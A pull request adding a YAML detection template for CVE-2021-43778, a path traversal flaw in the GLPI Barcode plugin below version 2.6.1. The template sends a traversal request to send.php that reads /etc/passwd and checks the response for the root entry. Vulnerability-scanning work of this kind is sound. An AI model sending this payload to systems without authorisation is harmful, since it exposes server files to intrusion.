### PR TITLE
add glpi-plugin-barcode-cve-2021-43778-path-traversal

### DIFF
--- a/pocs/glpi-plugin-barcode-cve-2021-43778-path-traversal.yml
+++ b/pocs/glpi-plugin-barcode-cve-2021-43778-path-traversal.yml
@@ -1,0 +1,17 @@
+name: poc-yaml-glpi-plugin-barcode-path-traversal
+manual: true
+transport: http
+rules: 
+    r0: 
+        request: 
+            cache: true
+            method: GET
+            path: /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
+            follow_redirects: false
+        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+expression: r0()
+detail: 
+    author: cckuailong(https://github.com/cckuailong)
+    links:
+        - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
+    version: < 2.6.1


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

GLPI plugin Barcode < 2.6.1 path traversal vulnerability

## 测试环境

![image](https://user-images.githubusercontent.com/10824150/144232858-e1a84180-438d-4824-813d-8439d0404769.png)


## 备注


